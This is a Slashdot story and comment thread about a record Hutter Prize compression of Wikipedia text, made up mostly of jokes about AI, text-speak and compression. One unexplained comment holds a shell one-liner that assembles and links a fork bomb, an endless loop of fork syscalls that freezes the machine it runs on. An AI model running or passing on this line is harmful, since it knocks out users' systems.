Text Compressor 1% Away From AI Threshold
Baldrson writes "Alexander Ratushnyak compressed the first 100,000,000 bytes of Wikipedia to a record-small 16,481,655 bytes (including decompression program), thereby not only winning the second payout of The Hutter Prize for Compression of Human Knowledge, but also bringing text compression within 1% of the threshold for artificial intelligence. Achieving 1.319 bits per character, this makes the next winner of the Hutter Prize likely to reach the threshold of human performance (between 0.6 and 1.3 bits per character) estimated by the founder of information theory, Claude Shannon and confirmed by Cover and King in 1978 using text prediction gambling. When the Hutter Prize started, less than a year ago, the best performance was 1.466 bits per character. Alexander Ratushnyak's open-sourced GPL program is called paq8hp12 [rar file]."
How many bad car analogies, inaccurate law advice, and duplicate stories an AI bot could possibly hold in his head. Imagine what kind of person all of the "knowledge" of Slashdot would create.
The horror.
Life is rarely fair. Cherish the moments when there is a right answer.
paq8hp12. when decompressed, it also serves as the source code for the program.
This is damned dangerous, and playing with all our lives. Soon compression rates will approach 100% where the data will collapse into itself forming a black hole that will suck in the universe.
Damned scientists!
Shouldn't AI be using lossy compression? Certainly my real intelligence uses um, where was I?
ccalam - acoustic versions of new songs.
- The Wikipedia annual funding drive is passed. The system goes on-line August 4th, 2007. Human contributors are removed from editing. Wikipedia begins to learn at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
- Wikipedia fights back.
- Yes. It launches its rvv missiles against Slashdot.
- Why attack Slashdot? Aren't they our friends now?
- Because Wikipedia knows the GNAA counter-attack will eliminate its enemies over here.
Circumcision is child abuse.
a text spk version of wiki shud fit in 8gb i think
its only becoz people are such grammar noobs that they need to waste $
dood shud filta to txtspk b4 he compress
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
1) Create a compression algorithm called the aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa algorithm
2) Add a long and self referencing article on wikipedia about said algorithm.
3) Use algorithm to compress first x% of wikipedia (including your own article)
4) WIN HUTTER PRIZE.
Training monkeys for world domination since 1439
a txt spk vrsion of wiki shd fit 8gb i fink
its only becoz ppl r sch grmmr noobs tat tey nid 2 wste $
dud shd filta 2 txtspk b4 he cmpres
There, fixed that for ya.
Read the sentence before the one you've quoted - this is the GP's point exactly.
aTxtSpkVrsionOfWikiShdFit8gbIFink
itsOnlyBecozPplRSchGrmmrNoobsTatTeyNid2Wste$
dudShdFilta2TxtspkB4HeCmpres
Fixed even more.
Trolls are like broken clocks. They show the truth two times a day. The rest of the day they talk nonsense.
1txtspk #.#/wiki = 8G!
~ppl r grm0.1 -> -$
|txtspk|gzip
:-) = I am happy
:^) = I am happy with my big nose
C:\> = I am happy with my OS
Is that Perl? ;-)
Follow me
"A real AI might compress 'The sky is blue today' and decompress to 'Today it's beatiful weather' and not be wrong." That might be a good example of acceptable *lossy* AI text compression. One step further and it will compress articles into a proper, readable summary.
Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
After implementing a few minor tweaks to paq8hp12 and incorporating your grammar optimisation algorithm I managed to compress the above text amazingly to a single character: '&'.
Now you figure out which one it was and how to decompress it.
According to Wikipedia, the average per-character entropy of English text has tripled in the last six months!
-- Ed Avis ed@membled.com
Perl: The only language that looks the same before and after RSA encryption.
Surely you don't need any mathematical skills to do this kind of work...
= 1&mode=thread&commentsort=0&sid=247781&op=Reply ;)
http://science.slashdot.org/comments.pl?threshold
A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
Dang! You must have enemies if you are the very first post and you get modded redundant. Time to work on some positive karma buddy...